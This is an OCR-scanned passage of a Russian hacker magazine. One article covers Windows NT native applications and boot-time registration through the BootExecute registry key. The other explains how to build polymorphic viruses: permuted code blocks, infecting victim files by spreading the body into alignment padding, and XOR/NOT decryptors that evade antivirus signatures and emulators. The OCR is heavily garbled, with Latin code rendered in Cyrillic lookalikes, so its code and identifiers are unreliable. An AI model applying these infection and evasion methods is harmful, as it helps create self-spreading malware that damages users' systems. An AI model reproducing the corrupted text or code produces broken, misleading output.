что можно было убрать из настро- 
ек, оставил все либо «по умолчанию» 
мом сорце я написал следующее: 




» 



О 



Если тебе нужен пример 
Nаііѵе-приложения для 
анализа, а аиіосбк не хва- 
тает, покопай С8Р88.ЕХЕ. 

Чтобы твоя студия умела 
находить \і- и ЧЬ-файлы, 
входящие комплект 00К, 
ты должен прописать в ее 
настройках дополнитель- 
ные пути для поиска. Для 
этого лезь в студии в ме- 
ню Тооів -> Орііоп, в зак- 
ладке Ргоіесів выбирай 
I /С++ ЕІігесіогіев и добав- 
ляй пути к папкам РЕК в 
Іпсіибе Іііев и ИЬгагу Ліев. 

Для удобной модификации 
РЕ -файл о в советую вос- 
пользоваться тебе связкой 
из следующих функций: 
ШСгеаіеЕіІе, 

І\ИСгеаіе8есііоп и 
2 шМар Ѵіе ѵѵОІЗесІіоп . С их 
помощью ты отобразишь 
нужный тебе файл себе в 
адресное пространство и 
скорректируешь его так, 
словно это твой собствен- 
ный код, а не какой-ни- 
будь системный ;). 

Для работы с реестром в 
І\Іаііѵе-приложении тебе 
предстоит разобраться с 
функциями ШСгеаіеКеу, 
ШОрепКеу, 
ШОиегуѴаІиеКеу и 
Ш8еІѴаІиеКеу. 



либо «взять из исходника», а в са- 




#ргадта соттепі(Ііпкег, "/ЗІІВЗѴЗТЕІѴШАТІѴЕ") 
#ргадта соттепі(Ііпкег,"/ВАЗЕ:0х0001 0000") 
#ргадта соттепІ(ІіЬ, "пісііі.ііЬ") 



Вместо обычной подсистемы ѴѴІІ\ЮОѴѴЗ я указал ЫАТІѴЕ, чтобы 
компилятор понял, с чем имеет дело, немного сдвинул вниз вирту- 
альный адрес, по которому будет доступен образ приложения в па- 
мяти, и подключил библиотеку для работы с пісііі.сііі. Все это можно 
было сделать, и путешествуя по Ргорегііез Радез проекта. 

Это все, что касалось настроек, а теперь плавно погружаемся в кодинг. 

#с!е!іпе _Х86_ 

#іпсІисіе <пШк.Ь 
#іпсІис!е "пиі" 



Вот таким незамысловатым образом начинается сам код программы (не 
считая прагм): два хедера — один из ЭЭК (не забудь, кстати, прописать 
пути к основным папкам ЭЭК, содержащим хедеры и либы) с описани- 
ем основных структур и типов, другой — с описаниями функций, экспор- 
тируемых пісііі.сііі. Определение идентификатора _Х86_ нужно для того, 
чтобы компилятор знал, какой вариант структур в пібсік выбирать, а то 
они могут различаться в зависимости от платформы. 

Как программирование, так и выполнения любого более или менее 
обычного приложения начинается с функции таіп (ѴѴіпМаіп, 
_іѴѴіпМаіп, в общем, название может быть любым, а смысл остается 
— точка входа), наш случай не исключение. У родных форточкам 
программ тоже есть таіп-функция, однако ее описание несколько от- 
личается. Во-первых, у нее не два параметра, как у консольных при- 
ложений, и не 4, как у обычных ѴѴіп32, а один — указатель на какую- 
то структуру. И я так бы и забил на его предназначение — ну, РѴОЮ, 
ну, и черт с ним — если бы не исследования мастера Руссиновича. 
Этот указатель он окрестил как РЗТАВТІІР_АВ(ЗІІМЕМТ и ввел нес- 
колько интересных определений: 



[ХАКЕР 10 [82] 05 > КОДИНГ 115] 









[ХАКЕР 10 [ 82 ] 05 > КОДИНГІ16] 



// структура, указатель на которую передается точке входа 

ІуребеІ зігисі { 

1Л_(Ж 11пкпсмп[3]; 

РЕЫѴІВОЫМЕЫТ_ІЫРОВМАТІОЫ Епѵігоптепі; 

} ЗТАВТиР_АВ61ЛѴІЕІ\ІТ, *РЗТАВТІІР_АВ61ІМЕМТ; 

// структура, на которую ссылается ЗТАВТІІР_АВ61ІМЕІ\ІТ 
// из интересного содержит командную строку, с которой 
// было запущено приложение и имя файла 

ІуребеІ зігисі { 

ІЛОИО 11пкпо\л/п[21]; 
иЫІС00Е_ЗТВІМѲ СоттапйЫпе; 
иЫ1С00Е_ЗТВ1М6 ІтадеРіІе; 

} ЕЫѴІВОЫМЕЫТ_ІЫРОВМАТІОМ, *РЕМѴІВОЫМЕЫТ_ІЫРОВМАТЮЫ; 

Во-вторых, таіп-функция — войдовая, то есть она ничего не возвраща- 
ет. Я уверен, что ты в курсе, что обычно для завершения работы прило- 
жения в таіп’е используется что-нибудь вроде геЮгп 0, но если ты дума- 
ешь, что в нашей функции достаточно будет написать просто геЮгп, то 
ты ошибаешься. По геТу мы ускачем неизвестно куда, так как в стеке 
может быть любая белиберда. Здесь подход иной: 

№ТегтіпаІеРгосе55(№Сиггеп1Ргосе55(), 0); 

Вот так следует делать, если хочешь, чтобы твоя программа когда-ни- 
будь завершилась. Если собрать все вышесказанное в кучку, выйдет 
вот такая таіп-функция: 

ѵоШ паІіѵе_таіп(РЗТАВТиР_АКйІШЕІ\ІТ агд) 

{ 

ШТегтіпа1еРгосе$$(ШСиггепІРгосе55(), 0); 

) 

Странное имя для таіп-функции, не правда ли? Компилятор тоже так по- 
думает, поэтому надо его предупредить добавлением еще одной прагмы. 

#ргадта соттегфііпкег, "/ЕІ\ІТВѴ:паІіѵе_таіп") 

Хорошая функция получается ;), правда, абсолютно бесполезная. Это 
поправимо. 

[НеІІо ѵѵоНсІ!] Давай для начала научим программу выводить что-ни- 
будь на прелестный светло-голубой экран, предвещающий скорое по- 
явления окошка для ввода пароля. Прежде всего надо усвоить, что 
строка для низкоуровневой части ѴѴіпбоѵѵз — это ипісобе-строка (а по 
этому поводу в срочном порядке лезь в настройки своего проекта, где 
в закладке ОепегаІ меняй СГіагасІег Зеі на ІІзе ІІпісобе СГіагасІег Зеі, 
чтобы все строки по умолчанию создавались в юникоде). Причем не 
просто массив слов (слова — это такие штуки, в которые 2 байта вле- 
зают), а специальная структура данных, содержащая указатель на мас- 
сив и его текущую и максимальную длины: 

ІуребеІ зігисі _ІЛ\ІІС(ЮЕ_5ТВІМ6 { 

УЗНОВТ І_епдШ; 

113Н0ВТ МахітитІ_епдІІі; 

РѴѴЗТВ ВиТТег; 

} 1Л\11ССЮЕ_ЗТВ1М6; 

Этот тип данных тебе запомнится надолго, так как в другом виде стро- 
ки здесь не перевариваются. Для удобной работы с подобными строка- 
ми пісііі экспортирует целый ряд функций, из которых следует отметить: 
+ ѴОЮ ВіІІпШпісосІеЗ!гіпд(ІІ\І ОІІТ Р11Ы1ССЮЕ_ЗТВ1МО, ІЫ РѴѴЗТВ) — функция, 
инициализирующая структуру Ш\ІІССЮЕ_ЗТВІІ\І(3 обычной ипісобе-строкой. 

// запихиваю в зігіпд нужную мне строку 

ІЛ\ІІССЮЕ_ЗТВІМЗ зігіпд; 

ВІІІпіШпісобеЗІгіпд(&$Ігіпд, ІЛпНеІІо... Нт... ѴѴогІб?”); 

- ЫТЗТАТІІЗ ВІІАпзіЗігіпдТоІІпісосІеЗігіпд(ІМ ОІІТ РІ)І\ІІСОЭЕ_ЗТВІІ\](3, ІІЧ 
РАІ\ІЗІ_ЗТВІІ\ІО, ІЫ ВООЬЕАЫ) — функция, преобразующая АЫЗІ_ЗТВІЫО в 
ІІІ\ІІССЮЕ_ЗТВІМ(3. Бывает очень полезна, если по какой-нибудь никому 
неведомой причине у тебя появилась апзі-строка, да еще и в структуре 
А1\131_ЗТВ1Ы(3 (которая, к слову, отличается от похожей по названию ипі- 
собе-структуры только указателем — в одной РѴѴЗТВ, в другой — РСНАВ). 




дизассемблируем аиІосНк.ехе, чтобы узнать что-нибудь новенькое 



- ѴОЮ ВІІІпіІАп5ІЗігіпд(ІЫ ОІІТ РАІ\ІЗІ_ЗТВІІ\Ю, ІЫ РС32) — нужна для 
того чтобы инициализировать упомянутую выше АЫЗІ_ЗТВІІ\КЗ с по- 
мощью самой обычной строки. 

// если не настроить проект на использование ЕІпісосІе СНагасіег ЗеІ, 
// то придется делать так 

ІІЫІС00Е_ЗТВІЫ0 ипісосіеЗІгіпд; 

АЫЗІ_ЗТВІЫѲ апзіЗІгіпд; 

ВІІІпіІАпзіЗІгіпд(&апзіЗІгіпд, І_“\пОІі, батпеі, поі адаіп! ! !”); 
ВіІАпзіЗІгіпдТоІІпісосІеЗІгіпд(&ипісосіеЗІгіпд, &апзіЗІгіпд, ТВІІЕ); 

// ТВІІЕ в третьем параметре определяет, выделять ли память 
// под ІІпісосІе-строку, если мы ее выделили, то впоследствии 
// придется ее освободить с помощью ВІІРгееІІпісобеЗІгіпд 

Этих трех функций хватит на все про все. Можно, конечно, покопать 
ЭЭК в поисках еще нескольких, но они вряд ли тебе пригодятся. 

Ну, а чтобы вывести на экран полученную в нужном формате строчку, нужна 
одна очень простая функция, всего с одним параметром. Угадай, с каким? 

// выводим многострадальную строку на голубой экран 

ШізрІауЗІгіпд(8шпісос]еЗІгіпд); 

[работа с файлами] Вывод на экран — это просто замечательно! Мож- 
но удивить друзей азсіі-графикой перед загрузкой, а, разобравшись с 
вводом с клавиатуры, можно и какую-нибудь простенькую диалоговую 
программку написать. Но всего это для нормального программирования 
мало. Для использования в целях разработки ВАТ тут нужно хотя бы с 
файлами работать, с реестром, уметь драйвера загружать. Это все не 
сложно, но требует определенного погружения в тему. К примеру, неко- 
торым очень непривычно использование вместо обычного имени файла 
для функции ЫЮгеаІеРіІе структуры ОВЭЕСТ_АТТВІВІІТЕЗ. 

ІуребеІ зігисі _0ВЖТ_АТТВ1В1ЛЕЗ { 

1Л_(Ж І_епдШ; 

НАШІ.Е ВооЮігесІогу; 

РІЛ\ІІССЮЕ_ЗТВІМ6 ОЬіесШате; 

1Л_(Ж АКгіЬиІез; 

РѴОЮ ЗесигіІуОезсгірІог; 

РѴОЮ ЗесигіІуОиаІіІуОІЗегѵісе; 

} 0ВЭЕСТ_АТТВІВІІТЕЗ; 

Люди ее зачем-то вручную заполняют, над каждым полем думают, му- 
чаются. А есть удобный макрос. Чтобы открыть файл в изег тобе, атри- 
буты объекта я определяю вот так: 

ІпШаІІ 2 еОЬіесШІгіЬиІез(&оа, &ІіІепате, І\ІШ_І_, І\ІШ_І_, ІМІІЩ; 

Іііепате здесь — это ІІІ\ІІССЮЕ_ЗТВІІ\І(3 с именем файла, причем запи- 
санным в специальном формате, перед полным путем нужно поставить 
\\??\\. ехріогег.ехе в такой записи выглядит как \\??\\С:\\ѴѴіпбоѵѵз\\ехрІог- 
ег.ехе. Ну, а само открытие соответственно: 

зіаіиз = ІМЮгеаШе (&бРНе, 6ЕЫЕВІС_ВЕА0 I ѲЕЫЕВІС_ѴѴВІТЕ I ЗѴІМ- 
СНВ0ІМІ2Е I Р11_Е_АРРЕШ_0АТА, &оа, &іо, 0, РІІ_Е_АТТВІВІІТЕ_І\І0В- 
МАІ_, РИЕ_ЗНАВЕ_Ѵ\/ВІТЕІ РИЕ_ЗНАВЕ_ВЕА0, РІІ_Е_0ѴЕВѴѴВІТЕ_ІР, 
_ЗУЫСНВ0Ы0иЗ_Ю_Ы0МАЕЕВТ, І\ІІЛ_І_, 0); 
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Отличия от ѴѴіп32 АРІ, как видишь, 
минимальны, появляются, конечно, 
некоторые новые структуры и опреде- 
ления, но с ними очень легко разоб- 
раться. Поэтому бери книги Неббета, 
Солдатова, а если хочешь научиться 
и драйвера из своего Ыаііѵе-приложе- 
ния грузить, то и Хогланда {шшюоік- 
іі.сот), и разбирайся. Если вдруг ка- 




статья гуру о паііѵе-приложениях 



кие-нибудь вопросы возникнут в процессе изучения — пиши, помогу кодом 
или советом по мере возможности. На этом я заканчиваю свое повествова- 
ние, надеюсь, что оно не побудит тебя к чему-нибудь противозаконному © 



оригинальный НЕі_і_оѵѵовиэ 

Немного измененный мной код Марка Руссиновича, 
копирующий параметры запуска в кучу и выводящий их 
на экран. 

#ргадта соттепЦІіпкег, М /ЗІІВЗУЗТЕМ:І\ІАТІѴЕ") 

#ргадта соттепІ(Ііпкег, "/ЕІ\ІТВУ:паІіѵе_таіп") 

#ргадта соттепІ(ІіЬ, "пісШ.ііЬ") 

#ргадта соттепІ(Ііпкег,"/ВАЗЕ:0х0001 0000") 

#сІеТіпе _Х86_ 

#іпсІисІе <п!сісік.Іі> 

#іпсІисІе <з1;сііо.И> 

#іпсІисІе "гтІ.М" 

1;уресІеТ зігисі { 

ІІІ.0ІМ6 11пкпо\л/п[21 ]; 

ІЛ\ІІС(ЮЕ_ЗТВІІ\І6 Соттапсіипе; 
иЫІС00Е_ЗТВІЫС ІтадеРіІе; 

} ЕМѴІВОШЕІ\ІТ_ІІ\ІРОВМАТІОІ\І, *РЕМѴІР0ММЕМТ_ІМР0РМАТІ0Ы; 

ІуребеІ зігисі { 

ІЛ.ОІМ0 ІІпкпоѵѵп[3]; 

РЕМѴІВ0І\ІМЕІ\ІТ_ІІ\ІР0ВМАТІ0І\І ЕпѵігоптепІ; 

} зтАвтир_АвеимЕі\гг, *рзтАвтир_АвеимЕі\іт; 

1;уресІеТ зігисі { 

ІЛ.0ІМ6 ЬепдШ; 
иі_ОІ\ЮІМпоѵѵп[11]; 

} ВТІ__РІЕАР_0ЕРІІ\ІІТІ0І\І, *РВТІ__НЕАР_0ЕРІІ\ІІТЮІ\І; 

ѵоісі па!іѵе_таіп(РЗТАВТІІР_АВ61ІМЕІ\ІТ АгдитепІ) 

{ 

РІЛ\ІІС(ЮЕ_5ТВІІ\І6 соттапсЛіпе; 

РѴѴСНАР зігіпдВиТТег, агдРІг; 

ІЛ\ІІС(ЮЕ_5ТВІІ\І6 ІіеІІоѴѴогІсі; 

ВТІ__РІЕАР_0ЕРІІ\ІІТІ0І\І ІіеарРагатз; 

тетзеІ(&ІіеарРагат5, 0, зі 2 еоІ(ВТЫНЕАР^ЕРІМТІОІ\І)); 
ІіеарРагатз. І_епдІІі = 5І2еоІ(ВТІ_НЕАР_ОЕРІЫІТІОЫ); 

Неар = ВІІСгеаІеРІеар(2, 0, 0x100000, 0x1000, 0, &ііеарРагатз); 

соттапсІЫпе = &АгдитепІ->ЕпѵігоптепІ->Соттапсіипе; 

агдРІг = соттапсіипе->ВиІІег; 
ѵѵЫІе (*агдРІг != и ') агдРІг++; 
агдРІг++; 

зІгіпдВиТТег = ВІІАІІосаІеРІеар( Неар, 0, 256 ); 
зѵѵргіпІЦзІгіпдВиІІег, Е"\п%з", агдРІг); 

ИеІІоѴѴогІсІ.ВиТТег = зІгіпдВиІІег; 

ІіеІІоѴѴогІсі. І_епдІІі = \л/сзІеп(з1гіпдВиТТег) * зігеоЦѴѴСРІАВ); 
ІіеІІоѴѴогІсі. МахітитІ_епдІіі = ІіеІІоѴѴогІсі ІепдІІі + зі 2 ео!(ѴѴСРІАВ); 
ЫШізрІау31:гіпд(&ііеІІоѴѴогІсі); 

ВІІРгееРІеар(РІеар, 0, ЗІгіпдВиІІег); 

№ТегтіпаІеРгосе55(№СиггепІРгосез5(), 0); 

} 



САМОЕ ГЛАВНОЕ — ЗАПУСК 

Во всей статье ты так и не встретил ни одного упоминания о 
том, как же все-таки запустить разработанную программу, 
загрузить ее еще до старта ѴѴіпсІоѵѵз. Я банально об этом забыл 
рассказать ;). Тут нет ничего сложного. Для того чтобы ІМаІіѵе- 
приложение запускалось до загрузки винды (собственно, 
никак иначе его и не запустить... стандартными средства- 
ми) нужно залезть в реестр, в 

НКЕУ_иОСАІ_МАСНІНЕ\ЗУЗТЕМ\СиггепЮотгоІЗеПСотгоІ\ 
Зеззіоп Мападег, открыть там ключ ВооІЕхесиІе (там уже 
лежит аиіосіік — это наш любимый скандиск) и добавить в 
него новую строку с именем программы, которое ты хотел 
бы стартовать. Прога, естественно, должна к моменту пе- 
резагрузки уже лежать в папке зузІет32. Можно процесс 
регистрации немного автоматизировать. Создай файл с 
расширением гед со следующим содержанием: 

ВЕ6Е0ІТ4 

[НКЕУ_тСАЕ_МАСНІМЕ\ЗУЗТЕМ\СиггепЮотгоІЗеЛСотгоІ\Зеззіоп 

Мападег] 

"ВооІЕхесиІе"=Ііех(7):61,75,74,6І,63,68,65,63,6Ь,20,61,75,74,6І,63,68,6Ь,20,2а,\ 
00, бе, 61 ,74, 69, 76, 65, 20, 48, 65, 6с, 6с, 61, 20, 57, 61, 72, 6с, 64, 21 ,00, 00 

А затем запусти. К ключу ВооІЕхесиІе добавится строчка 
«паііѵе», запускающая паііѵе. ехе, приложение, сорцы кото- 
рого ты можешь найти на диске. 

Другой вариант — это написать небольшой код специаль- 
но для регистрации нашего приложения. У меня на это не- 
хитрое дело ушло 5 минут. 

В001_ ВедізІгуАсіЩРЗТВ згАррІМате) 

{ 

сііаг 52ВедЕп1гу[1024]; 

ОѴѴОРЮ бѵѵВуІез = 1024; 

В00І_ геі = РАІ.ЗЕ; 

НКЕУ Іік; 

сііаг *32КеуРаІІі = "ЗУЗТЕМ\\СиггепЮопІгоІЗе1:\\СопІгоІ\\Зеззіоп Мападег"; 
// открываем ключик 

іі (НедСгеаІеКеу(Н КЕУ_ЮСАЕ_М АСН I N Е, згКеуРаЛі, &Іік) != 
ЕВВ0В_ЗІІССЕЗЗ) 
геіигп 0; 

// скидываем все данные в буфер 
іі (ВедОиегуѴаіиеЕхфк, "ВооІЕхесиІе", 

0,0, (І_РВУТЕ)52ВедЕпІгу, &сіѵѵВуІе5)) 

52 РедЕпІгу[ 0 ] = 0 ; 

// добавляем к буферу свою строчку 
ІзІгсаІ(&52ВедЕпІгу[сіѵѵВуІе5-1 ], згАррІМате); 
іі (РедЗеІѴаіиеЕх(іік, "ВооІЕхесиІе", 0, ВЕ6_МЮ_32, 

(ЬРВУТЕ) згВедЕпІгу, бѵѵВуІез + ІзІгІеп(52АррЫате) + 1)) 
доіо Ііпаііу; 
геі = ТРІІЕ; 

Ііпаііу: { 

//закрываем ключик 
іі (Іік) РедСІозеКеу(іік); 

} 

геіигп геі; 
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Ступени 

полиморфизма 

ТЕХНОЛОГИИ ПОЛИМОРФИЗМА МОЖНО ВСТРЕ- 
ТИТЬ НЕ ТОЛЬКО В ВИРУСАХ, НО И, НАПРИМЕР, 
В ЗАЩИТНЫХ МЕХАНИЗМАХ. ЭТО ПЕРЕДОВОЙ 
ПУТЬ ХАКЕРСКОЙ МЫСЛИ, ПРИТЯГИВАЮЩИЙ 
НОВИЧКОВ КАК МАГНИТОМ. ЭТО НАСТОЯЩИЙ 
ОМУТ АССЕМБЛЕРНЫХ КОНСТРУКЦИЙ, В КОТО- 
РЫЙ ЛЕГКО ПОПАСТЬ, НО ТРУДНО ВЫБРАТЬСЯ. 
ПОЛИМОРФНЫЕ ВИРУСЫ ДОСТАТОЧНО СЛОЖ- 
НАЯ ШТУКА, НО НАСТОЯЩИЕ ХАКЕРЫ ПРЯМЫХ 

ПУТЕЙ НЕ ИЩУТ I Крис Касперски ака мыщъх 



[ступень О: ретигіаііоп или простейшие перестановки] Идея: 
обрабатываемый код делится на блоки постоянного или переменного раз- 
мера, которые в каждом поколении вируса переставляются в случайном 
порядке. Это еще не настоящий полиморфизм, но и обычным такой код 
уже не назовешь. Он легко программируется, но и легко обнаруживается. 
Содержимое блоков остается неизменным, поэтому с ними справляется да- 
же сигнатурный поиск. 

Поскольку блоки «нарезаются» еще на стадии проектирования, проблемы 
случайного «расщепления» машинных команд границами блоков не возни- 
кает, и сочинять собственный дизассемблер длин нам не приходится. Тем 
не менее, при программировании возникают следующие проблемы: пос- 
кольку, адреса блоков в каждом поколении меняются, машинный код дол- 
жен быть полностью перемещаемым, то есть сохранять работоспособность 
независимо от своего местоположения. Это достигается путем отказа от 
непосредственных межблочных вызовов. Совершать переходы, вызывать 
функции, обращаться к переменным можно только в пределах «своего» 
блока. В практическом плане это значит, что вместе с кодом каждый блок 
несет и свои переменные. 

Но все-таки делать межблочные вызовы иногда приходится. Как? Зависит 
от фантазии. Проще всего создать таблицу с базовыми адресами всех бло- 
ков и поместить ее по фиксированному смещению, например, положить в 
первый блок. Она может выглядеть, например, так: 

[таблица косвенных вызовов с базовыми адресами всех блоков] 



Полиморфные генераторы изнутри 

Существуют тысячи готовых полиморфных движков, вобравших в 

себя множество блестящих идей, и чтобы переплюнуть их, придет- 

0 ся очень сильно постараться. Конечно, профессиональный хакер 

н может (и должен!) бросить вызов своим коллегам, удавить мир оче- 

< 

ш редным шедевром (или сначала удивить, а потом удавить). Но для 

этого требуется опыт. А где его взять? Правильно, начать програм- 
мировать простенькие полиморфные генераторы, повторяя кем-то 
давно пройденный путь. И вот так маленькими шажками хакерское 
сообщество движется путем прогресса из золотого века во тьму. 



Ьазе_1аЫе: 

Ыоск_1 йй оіізеі Ыоск_1 

Ыоск_2 дѴ оіізеі Ыоск_2 

Ыоск_І\ЮО оіізеі Ыоск_І\І 

А вызов блока может выглядеть так: 

[косвенный межблочный вызов, номер блока передается в регистре 
ЕЗІ, а смещение функции от начала блока — в регистре ЕВХ, аргу- 
менты функции можно передавать через стек] 



_0 



X 

2 



[классификация полиморфных генераторов] Принято выде- 
лять шесть ступеней полиморфизма: от простейших «одноклеточных» 
до развитых организмов. Будем следовать этой классификации и мы. 
Рассмотрим, как она выглядит с точки зрения хакера и антивируса. 



ЗНВ ЕЗІ, 2 ; умножаем номер блока на 4 

/кдд ЕЗІ, оіізеі Ьазе_1аЫе + 4 
; переводим в смещение 

; (4 понадобилось, потому что блоки нумеруются с 1) 






1.0050 

А00 ЕАХ, ЕВХ 
САН ЕАХ 



считываем адрес блока 
добавляем смещение функции 
вызываем блок 



Как вариант, можно поместить перед функцией А5СІІ2-строку с ее именем 
(например, "ту_Іипс"), а затем осуществлять ее хэш-поиск, что позволит 
абстрагироваться от смещений, а значит, упростить кодирование, но в этом 
случае содержимое всех блоков должно быть зашифровано, чтобы тексто- 
вые строки не сразу бросались в глаза. Впрочем, шифруй — не шифруй, 
антивирус все равно сможет нас обнаружить, а, обнаружив, — поиметь. 
Процедуру опознания можно существенно затруднить, если сократить раз- 
мер блоков до нескольких машинных команд, «размазав» их по телу фай- 
ла-жертвы. Внедряться лучше всего в пустые места (например, последова- 
тельности нулей или команд ІЧОР /* 90Н 7, образующиеся при выравнива- 
нии). В противном случае нам придется где-то сохранять оригинальное со- 
держимое файла, а затем восстанавливать его, а это геморрой. 

Нарезка блоков может происходить как статически — на стадии разработ- 
ки вируса, так и динамически — в процессе его внедрения, но тогда нам 
потребуется дизассемблер длин, сложность реализации которого намного 
превышает «технологичность» всего пермутирующего движка. Ладно, 
прекратим отвлекаться и рассмотрим общую стратегию внедрения. 

Вирус сканирует файл на предмет поиска более или менее длинной последо- 
вательности команд ЫОР или цепочек нулей, записывает в них кусочек свое- 
го тела и добавляет команду САН для перехода на следующий фрагмент. Так 
продолжается до тех пор, пока вирус полностью не окажется в файле. 
Различные программы содержат различное количество свободного места, 
расходующегося на выравнивание. В программы, откомпилированные с 
выравниванием на величину 4-х байт, втиснуться практически нереально 
(поскольку даже команда перехода, не говоря уже о команде САН, зани- 
мает, по меньшей мере, два байта). С программами, откомпилированными 
с величиной выравнивания от 08Н до 10И байт все намного проще, и они 
вполне пригодны для внедрения. Ниже в качестве примера приведен фраг- 
мент одного из таких вирусов. 

[фрагмент файла, зараженного пермутирующим вирусом, «размазы- 
вающим» себя по кодовой секции] 



4ехІ:08000В09 


хог 


еах, еах 


.ІехІ:08000ВОВ 


хог 


еЬх, еЬх 


.ІехШОООВОй 


саІІ 


Іос_8000С01 


.ІехШОООСОІ Іос_8000С01: 






.ІехШОООСОІ 


тоѵ 


еЬх, езр 


4ехІ:08000С03 


тоѵ 


еах, 901і 


4ехІ:08000С08 


іпі 


801і 


.ІехІ:08000С0А 


асісі 


езр, Ш 


4ехІ:08000С(Ю 


саІІ 


Іос_800(Ю18 


.ІехІ:0800(Ю18 Іос_800(Ю18: 






4ехІ:0800(Ю18 


сіес 


еах 


.ІехІ:0800(Ю19 


саІІ 


зііогі Іос_800(Ю53 


.ІехШООСЮІВ 


саІІ 


зііогі Іос_800(Ю2В 


4ехІ:0800(Ю53 Іос_800(Ю53: 






.1ехШ00(Ю53 


іпс 


еах 


.ІехІ:0800(Ю54 


тоѵ 


[еЬр+8000466Іі], еах 


4ехІ:0800(Ю5А 


тоѵ 


есіх, еах 


.ІехІ:0800(Ю5С 


саІІ 


зііогі Іос_800(Ю6С 



Естественно, фрагменты вируса не обязательно должны следовать линей- 



но друг за другом. Напротив, если только создатель вируса не даун, САІ_І_'ы 
будут блохой скакать по всему файлу, используя левые эпилоги и прологи 
для слияния с окружающими функциями. 

В машинном представлении САН Іагдеі является относительным адресом. 
Как правильно вычислить относительный адрес перехода? Определяем сме- 
щение команды перехода от физического начала секции, добавляем к нему 
три или пять байт (в зависимости от длины команды). Полученную величину 
складываем в виртуальным адресом секции и кладем полученный результат 
в переменную аі . Затем определяем смещение следующей цепочки, отсчи- 
тываемое от начала той секции, к которой она принадлежит, и складываем 
его с виртуальным адресом, записывая полученный результат в переменную 
а2. Разность а2 и аі и представляет собой операнд инструкции САН. 
Теперь необходимо как-то запомнить начальные адреса, длины и исходное 
содержимое всех цепочек. Если этого не сделать, тогда вирус не сможет 
извлечь свое тело из файла для внедрения в остальные файлы. Вот поэто- 
му-то для перехода между блоками мы использовали команду САН, а не 
ЛѴІР! При каждом переходе на стек забрасывается адрес возврата, предс- 
тавляющий собой смещение конца текущего блока. Как нетрудно сообра- 
зить, совокупность адресов возврата представляет собой локализацию 
«хвостов» всех используемых цепочек, а адреса «голов» хранятся... в опе- 
ранде команды САП! Извлекаем очередной адрес возврата, уменьшаем 
его на четыре и — относительный стартовый адрес следующей цепочки пе- 
ред нами! Так что «сборка» вирусного тела не будет большой проблемой! 

[ступень 1: выбор случайного расшифровщика из списка] Идея: 
создаем некоторое количество шифровщиков/расшифровщиков, выбираем 
случайный шифровщик и зашифровываем тело вируса вместе с остальны- 
ми шифровщиками/расшифровщиками. В каждом последующем поклоне- 
нии расшифровщик расшифровывает вирус, передает управление основно- 
му телу, а перед внедрением выбирает случайный шифровщик, которым его 
и зашифровывает. Код вируса меняется на 100% и «визуально» опознать 
зараженный файл уже не представляется возможным. 

Правда, поскольку количество расшифровщиков всегда конечно (даже ес- 
ли оно очень-очень велико), сигнатурный поиск остается достаточно эф- 
фективной мерой противодействия. Антивирус просто заносит в базу «фо- 
тороботы» всех расшифровщиков и... хана вирусу. Правда, тут есть одно 
небольшое «но». Расшифровщики различных вирусов (и даже честных 
программ с навесной защитой) обычно похожи как две капли воды, и пото- 
му в их детектировании нет никакой пользы. Антивирус вынужден привле- 
кать эмулятор, имитирующий выполнение расшифровщика и раскриптовы- 
вающий основной вирусный код. Если распаковщик содержит антиотла- 
дочные команды или использует машинные инструкции, не поддерживае- 
мые эмулятором, антивирус обломается по полной программе. Здесь, 
правда, появляется проблема типа «грабли», на которые наступают те, кто 
борется в эмулятором. Чем больше антиотладочных приемов содержит 
расшифровщик, тем выше его уникальность и, следовательно, надежнее 
детектирование. Строго говоря, первая ступень — это еще не полимор- 
физм. Такие вирусы называют псевдополиморфными или олигоморфика- 
ми, но все-таки это уже большой шаг вперед. 

Какие проблемы возникают при кодировании? Во-первых, код расшифров- 
щика должен быть полностью перемещаемым. Тут базара нет! Написать 
такой расшифровщик несложно. Во-вторых, расшифровщик должен как-то 
определять начало и конец зашифрованного фрагмента. Это тоже решае- 
мо. Шифровка не изменяет длину данных, и размер шифроблока будет 
постоянен для всех расшифровщиков, так что его можно вычислить еще на 
стадии ассемблирования. В-третьих, для каждого шифровщика должен су- 
ществовать парный расшифровщик или же выбранный криптоаглгоритм 
должен быть симметричен, то есть повторная шифровка зашифрованного 
текста расшифровывает его. 

Свойством симметрии обладают операции ЫОТ; ХОВ X, любая константа; 




[ХАКЕР 10 [82] 05 > КОДИНГ 121 ] 









[ХАКЕР 10 [82] 05 > КОДИНГ 122 ] 



РЮІ./ВОР X, 4 и некоторые другие арифметическо-логические операции, 
например, Айй Ьу1е,100И/2. Простейший симметричный шифровщик может 
выглядеть так (предварительно необходимо открыть сегмент кода на за- 
пись, что можно сделать функцией ѴігІиаІРгоіесІ): 

[симметричный расшифровщик на основе ХОР] 



ХОРАЦ 66 
М0Ѵ[Е0І], АІ_ 
ЗШЕОІ, -1 
А00 ЕСХ, -1 
^ N2 ту_Ьедіп 



МОѴЕЗІ, оіізеі Ьосіу_Ьедіп 
МОѴЕОІ, ЕЗІ 

МОѴЕСХ, оТТзеІ: Ьосіу_епсІ — ЬосІу_Ьедіп 
ту_Ьедіп: 

ЮЮЗВ 
ХОРАЦ 66И 
ЗТОЗВ 

ЮОР ту_Ьедіп 
ЬосІу_Ьедіп: 



Поскольку синонимы команд подготавливаются вручную еще на этапе ас- 
семблирования, автоматически определять их длины совсем необязатель- 
но! Реализация получается очень простая. Единственную проблему предс- 
тавляют метки. Как видно, и абсолютное, и относительное смещение 
ту_Ьедіп изменилось. Мы не можем на этапе ассемблирования подстав- 
лять в команду Ж7. смещение ту_Ьедіп, поскольку оно будет указывать в 
космос. Что делать? Вот одно из решений проблемы. Вместо метки подс- 
тавляем команду сохранения текущего ЕІР в один из свободных регистров 
общего назначения, а затем прыгаем на него: 

[автоматическое определение смещений меток] 



; //тело вируса со всеми остальными шифровщиками 



ту_Ьедіп: 



ЬосІу_епсІ: 


САІ_І_ $+5 


; прыгаем на следующую команду, занося ЕІР в стек 




РОР ЕВХ 


; выталкиваем ЕІР из стека 


А вот другой расшифровщик: 


РОЗН ЕВХ 


; (как вариант, можно дать ШС ЕВХ) 


[симметричный расшифровщик на основе N01] 


Ш $+4 


; выход из расшифровщика 




^Р ЕВХ 


; переход на ту_Ьедіп с динамическим опреде- 



І_ЕА ЕАХ, Ьос1у_епсІ 
ту_Ьедіп: 

N01 Ьуіе ріг 03:[ЕАХ] 

ЗІІВ ЕАХ, оТТзеІ: ЬосІу_Ьедіп +1 
РІІЗНР 

А00 ЕАХ, оіізеі ЬосІу_Ьедіп 
РОРР 

^ N2 ту_Ьедіп 
ЬосІу_Ьедіп: 

; //тело вируса со всеми остальными шифровщиками 
ЬосІу_епсІ: 

Несимметричные шифровщики/расшифровщики устроены сложнее. Мож- 
